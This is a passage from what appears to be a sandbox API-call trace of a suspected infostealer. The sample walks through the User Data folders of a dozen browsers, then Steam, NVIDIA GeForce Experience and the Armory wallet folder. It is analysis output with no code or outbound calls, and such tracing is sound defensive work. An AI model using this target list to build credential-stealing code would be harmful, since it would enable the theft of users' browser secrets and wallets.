lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data", lpFilePart=0x0) returned 0x40 [0267.433] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data\\", lpFilePart=0x0) returned 0x41 [0267.433] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\360browser\\browser\\user data\\*"), lpFindFileData=0x19eedc | out: lpFindFileData=0x19eedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0267.434] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f178) returned 1 [0267.438] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0267.438] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Maxthon3\\User Data", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon3\\User Data") returned 0x37 [0267.439] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1b4) returned 1 [0267.439] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon3\\User Data", nBufferLength=0x105, lpBuffer=0x19ecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon3\\User Data", lpFilePart=0x0) returned 0x36 [0267.439] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon3\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon3\\User Data\\", lpFilePart=0x0) returned 0x37 [0267.439] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon3\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\maxthon3\\user data\\*"), lpFindFileData=0x19eedc | out: lpFindFileData=0x19eedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0267.440] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f178) returned 1 [0267.441] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0267.441] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\K-Melon\\User Data", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\K-Melon\\User Data") returned 0x36 [0267.441] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1b4) returned 1 [0267.441] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\K-Melon\\User Data", nBufferLength=0x105, lpBuffer=0x19ecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\K-Melon\\User Data", lpFilePart=0x0) returned 0x35 [0267.442] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\K-Melon\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\K-Melon\\User Data\\", lpFilePart=0x0) returned 0x36 [0267.442] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\K-Melon\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\k-melon\\user data\\*"), lpFindFileData=0x19eedc | out: lpFindFileData=0x19eedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0267.442] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f178) returned 1 [0267.447] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0267.447] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Sputnik\\Sputnik\\User Data", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\Sputnik\\User Data") returned 0x3e [0267.447] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1b4) returned 1 [0267.447] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\Sputnik\\User Data", nBufferLength=0x105, lpBuffer=0x19ecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\Sputnik\\User Data", lpFilePart=0x0) returned 0x3d [0267.447] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\Sputnik\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\Sputnik\\User Data\\", lpFilePart=0x0) returned 0x3e [0267.447] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\Sputnik\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\sputnik\\sputnik\\user data\\*"), lpFindFileData=0x19eedc | out: lpFindFileData=0x19eedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0267.448] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f178) returned 1 [0267.450] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0267.450] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Nichrome\\User Data", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data") returned 0x37 [0267.450] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1b4) returned 1 [0267.450] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data", nBufferLength=0x105, lpBuffer=0x19ecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data", lpFilePart=0x0) returned 0x36 [0267.450] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\", lpFilePart=0x0) returned 0x37 [0267.450] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\nichrome\\user data\\*"), lpFindFileData=0x19eedc | out: lpFindFileData=0x19eedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0267.451] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f178) returned 1 [0267.452] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0267.452] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\CocCoc\\Browser\\User Data", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data") returned 0x3d [0267.452] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1b4) returned 1 [0267.452] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data", nBufferLength=0x105, lpBuffer=0x19ecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data", lpFilePart=0x0) returned 0x3c [0267.452] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\", lpFilePart=0x0) returned 0x3d [0267.452] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\coccoc\\browser\\user data\\*"), lpFindFileData=0x19eedc | out: lpFindFileData=0x19eedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0267.453] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f178) returned 1 [0267.454] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0267.454] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Uran\\User Data", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Uran\\User Data") returned 0x33 [0267.454] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1b4) returned 1 [0267.454] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Uran\\User Data", nBufferLength=0x105, lpBuffer=0x19ecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Uran\\User Data", lpFilePart=0x0) returned 0x32 [0267.455] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Uran\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Uran\\User Data\\", lpFilePart=0x0) returned 0x33 [0267.455] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Uran\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\uran\\user data\\*"), lpFindFileData=0x19eedc | out: lpFindFileData=0x19eedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0267.455] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f178) returned 1 [0267.456] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0267.456] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Chromodo\\User Data", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromodo\\User Data") returned 0x37 [0267.457] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1b4) returned 1 [0267.457] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromodo\\User Data", nBufferLength=0x105, lpBuffer=0x19ecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromodo\\User Data", lpFilePart=0x0) returned 0x36 [0267.457] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromodo\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromodo\\User Data\\", lpFilePart=0x0) returned 0x37 [0267.457] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromodo\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\chromodo\\user data\\*"), lpFindFileData=0x19eedc | out: lpFindFileData=0x19eedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0267.457] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f178) returned 1 [0267.459] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0267.459] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Mail.Ru\\Atom\\User Data", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Mail.Ru\\Atom\\User Data") returned 0x3b [0267.459] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1b4) returned 1 [0267.459] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Mail.Ru\\Atom\\User Data", nBufferLength=0x105, lpBuffer=0x19ecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Mail.Ru\\Atom\\User Data", lpFilePart=0x0) returned 0x3a [0267.459] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Mail.Ru\\Atom\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Mail.Ru\\Atom\\User Data\\", lpFilePart=0x0) returned 0x3b [0267.459] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Mail.Ru\\Atom\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\mail.ru\\atom\\user data\\*"), lpFindFileData=0x19eedc | out: lpFindFileData=0x19eedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0267.460] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f178) returned 1 [0267.461] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0267.461] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data") returned 0x4a [0267.461] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1b4) returned 1 [0267.461] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data", nBufferLength=0x105, lpBuffer=0x19ecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data", lpFilePart=0x0) returned 0x49 [0267.461] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\", lpFilePart=0x0) returned 0x4a [0267.461] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\bravesoftware\\brave-browser\\user data\\*"), lpFindFileData=0x19eedc | out: lpFindFileData=0x19eedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0267.461] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f178) returned 1 [0267.463] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0267.463] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Microsoft\\Edge\\User Data", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data") returned 0x3d [0267.463] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1b4) returned 1 [0267.463] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data", nBufferLength=0x105, lpBuffer=0x19ecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data", lpFilePart=0x0) returned 0x3c [0267.463] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\", lpFilePart=0x0) returned 0x3d [0267.463] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\edge\\user data\\*"), lpFindFileData=0x19eedc | out: lpFindFileData=0x19eedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0267.463] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f178) returned 1 [0267.465] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0267.465] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\NVIDIA Corporation\\NVIDIA GeForce Experience", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\NVIDIA Corporation\\NVIDIA GeForce Experience") returned 0x51 [0267.465] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1b4) returned 1 [0267.465] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\NVIDIA Corporation\\NVIDIA GeForce Experience", nBufferLength=0x105, lpBuffer=0x19ecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\NVIDIA Corporation\\NVIDIA GeForce Experience", lpFilePart=0x0) returned 0x50 [0267.465] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\NVIDIA Corporation\\NVIDIA GeForce Experience\\", nBufferLength=0x105, lpBuffer=0x19ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\NVIDIA Corporation\\NVIDIA GeForce Experience\\", lpFilePart=0x0) returned 0x51 [0267.465] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\NVIDIA Corporation\\NVIDIA GeForce Experience\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\nvidia corporation\\nvidia geforce experience\\*"), lpFindFileData=0x19eedc | out: lpFindFileData=0x19eedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0267.465] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f178) returned 1 [0267.467] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0267.467] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Steam", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Steam") returned 0x2a [0267.467] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1b4) returned 1 [0267.467] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Steam", nBufferLength=0x105, lpBuffer=0x19ecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Steam", lpFilePart=0x0) returned 0x29 [0267.467] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Steam\\", nBufferLength=0x105, lpBuffer=0x19ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Steam\\", lpFilePart=0x0) returned 0x2a [0267.467] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Steam\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\steam\\*"), lpFindFileData=0x19eedc | out: lpFindFileData=0x19eedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0267.467] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f178) returned 1 [0267.468] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0267.468] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\CryptoTab Browser\\User Data", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data") returned 0x40 [0267.468] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1b4) returned 1 [0267.468] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data", nBufferLength=0x105, lpBuffer=0x19ecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data", lpFilePart=0x0) returned 0x3f [0267.469] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data\\", lpFilePart=0x0) returned 0x40 [0267.469] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\cryptotab browser\\user data\\*"), lpFindFileData=0x19eedc | out: lpFindFileData=0x19eedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0267.469] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f178) returned 1 [0267.489] ExpandEnvironmentStringsW (in: lpSrc="%appdata%", lpDst=0x19f1a4, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x26 [0267.489] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\Armory", lpDst=0x19f1a4, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Armory") returned 0x2d [0267.489] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Armory", nBufferLength=0x105, lpBuffer=0x19ede8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Armory", lpFilePart=0x0) returned 0x2c [0267.490] SetThreadErrorMode (dwNewMode=0x1, 